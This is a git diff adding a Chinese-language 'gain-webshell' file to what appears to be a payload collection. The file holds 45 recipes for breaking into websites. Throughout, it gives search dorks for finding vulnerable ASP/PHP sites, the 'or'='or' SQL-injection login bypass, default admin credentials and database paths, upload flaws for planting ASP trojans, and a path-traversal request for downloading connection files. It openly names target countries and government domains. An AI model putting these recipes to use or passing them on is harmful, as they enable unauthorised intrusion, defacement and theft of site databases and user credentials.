diff --git a/payloads/other/gain-webshell b/payloads/other/gain-webshell new file mode 100644 index 0000000..14017c1 --- /dev/null +++ b/payloads/other/gain-webshell @@ -0,0 +1,240 @@ +#gain-webshell + +1中国黑客部教程,首先到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库! + +2到Google ,site:cq.cn inurl:asp + +3,利用挖掘鸡和一个ASP木马. +文件名是login.asp +路径组是/manage/ +关键词是went.asp +用'or'='or'来登陆 + +4,关键字:Co Net MIB Ver 1.0网站后台管理系统 +帐号密码为 'or'='or' + +5.动感购物系统 +inurl:help.asp登陆,如未注册成为会员! + +upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞 + + +6。默认数据库地址blogdata/acblog.asa +关键字:acblog + +7.百度 /htdocs +注册里可以直接上传asa文件! + + +8./Database/#newasp.mdb +关键词:NewAsp SiteManageSystem Version + + +9.用挖掘机 +关键字:Powered by WEBBOY +页面:/upfile.asp + +10.baidu中搜索关键字Ver5.0 Build 0519 +(存在上传漏洞) + +11.Upfile_Article.asp bbs/upfile.asp +输入关键字:powered by mypower , + +12.inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站 + +13.现在GOOGLE搜索关键字 intitle:网站小助手 inurl:asp + +14.键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛 + +挖掘鸡的关键字 添 setup.asp + +15.VBulletin论坛的数据库 +默认数据库地址! +/includes/functions.php +工具: +1.网站猎手 下载地址:百度 Google! +2.Google +关键字: +Powered by: vBulletin Version 3.0.1 +Powered by: vBulletin Version 3.0.2 +Powered by: vBulletin Version 3.0.3 +其中一个就可以了 + +16.shopping cart +1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart +open source。 这是一个商场系统。 +2.网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~ +猜到,comersus.mdb. 是数据库名 +数据库都是放在database/ 后的, +所以database/comersus.mdb +comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。 +那样把前一个''store/''除去,再加上database/comersus.mdb 试试 + +17.无忧传奇官方站点程序。 + 1、后台管理地址:http://您的域名/msmiradmin/ + 2、默认后台管理帐号:msmir + 3、默认后台管理密码:msmirmsmir +数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb +数据库连接文件为 ***********/Conn.asp + +18.百度里输入/skins/default/ + +19.利用挖掘机 +关键机:power by Discuz +路径:/wish.php +配合: +Discuz!论坛 wish.php远程包含漏洞 工具使用 + +20.上传漏洞. +工具 : Domain3.5 + 网站猎手 1.5版 +关键字powered by mypower +检测的页面或文件插入upfile_photo.asp + + +21.新云漏洞 +这个漏洞ACCESS和SQL版通吃。 +Google搜索关键字 "关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录" +把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp +以源码,软件等下载站居多。 +大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了 +\database\%23newasp.mdb +如:#xzws.mdb 改成%23xzws.mdb + +22.通吃所有商城+动力上传系统 + +使用工具:挖掘鸡 v1.1 明小子 +商城入侵: +关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成 +漏洞页面:upload.asp + upfile_flash.asp + +动力入侵: +关键字:powered by mypower +漏洞页面:upfile_photo.asp + Upfile_Soft.asp + upfile_adpic.asp + upfile_softpic.asp + +23.注射漏洞 +百度搜索ioj's blog + +24动易 +列目录 +admin_articlerecyclebin.asp +inurl:admin_articlerecyclebin.asp + +25.manage/login +工具:网站猎手 +关键词:inurl:Went.asp +后缀:manage/login.asp +口令:'or'='or' + +26.入侵魔兽私服 +需要的工具:ASP木马一只。 + Domain3.5明小子 +关键字:All Right Reserved Design:游戏联盟 +后台地址:admin/login.asp +数据库的地址:chngame/#chngame.mdb + +27.漏洞是利用管理员iis设置的失误 +用baidu 关键字就是比较罕见的脚本名 +动网: ReloadForumCache.asp +Leadbbs: makealltopanc.asp +BBSXP: admin_fso.asp +动易: admin_articlerecyclebin.asp + +28.国外站的爆库漏洞 +关键字:sad Raven's Guestbook +密码地址:/passwd.dat +后台地址:/admin.php + +29.Discuz 4.1.0跨站漏洞 +利用工具:1,WAP浏览器 + 2,WAP编码转换器 +关键字:"intextiscuz! 4.1.0" + +30.关键字:尚奈克斯 +后台路径/system/manage.asp +直接传ASP木马 + +31.工具 +1:网站猎手 +2:大马一个 +关键字:切勿关闭Cookies功能,否则您将不能登录 +插入diy.asp + +32. +关键字:Team5 Studio All rights reserved +默认数据库:data/team.mdb + +33. +工具: 挖掘机 辅臣数据库读取器 +关键字: 企业简介 产品展示 产品列表 +后缀添加: /database/myszw.mdb +后台地址: admin/Login.asp + +34. +关键子 XXX inurl:Nclass.asp +在"系统设置"里写个木马。 +会被保存到 在 config.asp内。 + +35. +不进后台照样拿动网WEBSHELL +data.asp?action=BackupData 动网数据库备份默认路径 + +36. +工具:网站猎手 WebShell +关键字:inurl:Went.asp +后缀:manage/login.asp +弱口令:'or'='or' + +37. +关键字owered byCDN_NEWS +随便扫遍文章加一个' ,来试探注入点 +后台地址:admin_index.asp + +38. +入侵雷池新闻发布系统 +关键字:leichinews +去掉leichinews后面的. +打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp +再上传马..... +进访问uppic anran.asp 登陆马. + +39. +关键字ower System Of Article Management Ver 3.0 Build 20030628 +默认数据库:database\yiuwekdsodksldfslwifds.mdb +后台地址:自己扫描! + +40. +一、通过GOOGLE搜索找大量注入点 +关键字:asp?id=1 gov.jp/ asp?id= +页数:100 +语言:想入侵哪个国家就填什么语言吧 + +41. +关键字:Powered by:94KKBBS 2005 +利用密码找回功能 找回admin +提问:ddddd 回答:ddddd + +42. +关键字:inurl:Went.asp +后台为manage/login.asp +后台密码: 'or'=' 或者 'or''=''or' 登录 进入 +默认数据库地址atabase/DataShop.mdb + +43. +关键字:****** inurl:readnews.asp +把最后一个/改成%5c ,直接暴库,看密码,进后台 +随便添加个新闻 在标题输入我们的一句话木马 + +44. +工具:一句话木马 + BBsXp 5.0 sp1 管理员猜解器 +关键词:powered by bbsxp5.00 +进后台,备份一句话马! + +45. +关键字:程序核心:BJXSHOP网上开店专家 +后台:/admin